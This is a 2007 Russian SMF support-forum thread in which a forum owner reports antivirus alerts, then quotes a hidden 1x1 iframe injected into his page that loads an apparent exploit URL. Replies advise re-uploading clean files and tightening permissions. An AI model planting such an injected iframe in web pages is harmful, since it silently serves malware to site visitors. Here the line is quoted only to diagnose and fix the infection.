Вирусы!?

Автор Proffi, 08 мая 2007, 00:29:13

« назад - далее »

0 Пользователи и 1 гость просматривают эту тему.

Proffi

 :'( привет всем, я незнаю что делать.. Мне уже два посетителя сообщили что заходя на форум каждый раз их антивирусы начинают кричать..
Касперски инет сикьюрити сказал что обнаружено: троянская программа Trojan-Downloader.VBS.Psyme.fc_URL: h**p://***-adult.info/traffic/qd01/index.php//Crypt.DCScript
Я знаю что этот троян предназначен для загрузки других троянов на машину..
и он сохраняется во временный каталог Windows "Temp" под именем "update.exe" или "file.exe"
Версия smf 1.1.2, модули ни какие не устанавливал, тема дефолт, в ней только изменён файл index.template.php (добавил счетчик mail..) Помогите пожалуйсто розобратся, ато уже сил нету..  :'( (Спасибо!)

форум находится по адресу http://forum.dedoff.com/

Proffi

Только-что просмотрел исходный код главной страницы..
Обнаружил в самом низу кода две строчки:

<div id="ajax_in_progress" style="display: none;">Загружается...</div>
</body></html><iframe src='http://pynet.ws/exp/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

скопировав ссылку http://pynet.ws/exp/index.php и вставив её в браузер, меня перенаправило на страницу http://nnew-adult.info/traffic/qd01/index.php я не ждал пока она загрузится.. немедлено покинул сайт!

В чём дело?  knuppel

Mavn

проверяйте комп на вирусы потому как никто на офф сайте или у нас распространением заразы не занимается косяк в ваших кривых руках
SimpleMachines Russian Community Team
п.1 Пройду курсы гадалок для определения исходного кода по скриншоту.

п.2 У вас нет желания читать правила раздела, у меня нет желания одобрять темы, которые не соответствуют этим правилам.

Avdenago

Ну я скажу еще так. Вы не первый.

Естественно вы подхватили это где-то. 
Пожалуйста. Перезалейте файлы форума на оригинальные, а потом настройте свой сервер для наилучшей защищенности используя права доступа и htaccess

Proffi

Цитата: Mavn от 08 мая 2007, 02:09:14
проверяйте комп на вирусы потому как никто на офф сайте или у нас распространением заразы не занимается косяк в ваших кривых руках

На пк был установлен антивирус dr.web, я проверял всё что загружал с инета и все диски которые запускал.. Копм всегда был под наблюдением.. (антивирус ничего не обнаруживал..)
Установил Kaspersky Internet Securiti 6.0 и сразу нашёл 19 троянов.. (Проблема как Вы выразелись не в моих "кривых руках" а в dr.web'e!)

Цитата: Avdenago от 08 мая 2007, 11:19:40
Ну я скажу еще так. Вы не первый.

Естественно вы подхватили это где-то. 
Пожалуйста. Перезалейте файлы форума на оригинальные, а потом настройте свой сервер для наилучшей защищенности используя права доступа и htaccess

ok, спасибо за тёплые слова :) Я знаю что делать, в начале просто подумал что архив был изначально заражен на Вашем сервере, но это не так.. (Искрене извиняюсь..)